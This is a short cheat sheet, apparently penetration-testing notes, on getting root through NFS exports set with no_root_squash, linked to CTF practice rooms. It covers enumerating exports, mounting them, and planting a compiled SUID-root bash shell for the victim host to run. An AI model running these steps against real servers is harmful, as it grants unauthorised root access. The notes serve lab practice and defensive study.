NFS - Network File System
Show mounts on remote NFS server
# showmount -e 10.10.177.215 Export list for 10.10.177.215: /opt/conf * #
NFS exploit
Example of no_root_squash
[paradox@localhost tmp]$ cat /etc/exports cat /etc/exports /home/james *(rw,fsid=0,sync,no_root_squash,insecure) [paradox@localhost tmp]$
Yet another example of no_root_squash
john@enterprize:~$ cat /etc/exports cat /etc/exports /var/nfs localhost(insecure,rw,sync,no_root_squash,no_subtree_check) john@enterprize:~$
On attack machine
# mkdir /tmp/nfs
# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
First mount failed
# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe mount.nfs: rpc.statd is not running but is required for remote locking. mount.nfs: Either use '-o nolock' to keep locks local, or start statd. #
# apt install nfs-common # service rpcbind restart # service statd start
# mount -o rw,vers=2 localhost:/home/james /tmp/nfs mount.nfs: requested NFS version or transport protocol is not supported
apt install nfs-common nfs4-acl-tools
root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs mount.nfs: Protocol not supported root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs root@T420:/tmp/nfs# ls /tmp/nfs credentials.bak root@T420:/tmp/nfs#
# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x
On NFS server (victim) machine
$ /tmp/x #
References
NFS no_root_squash/no_all_squash misconfiguration PE
Network File System on Wikepedia
Practice
>>> THM | Linux PrivEsc - Task 19 - NFS
>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing
>>> THM | Overpass 3 - Hosting
>>> THM | Enterprize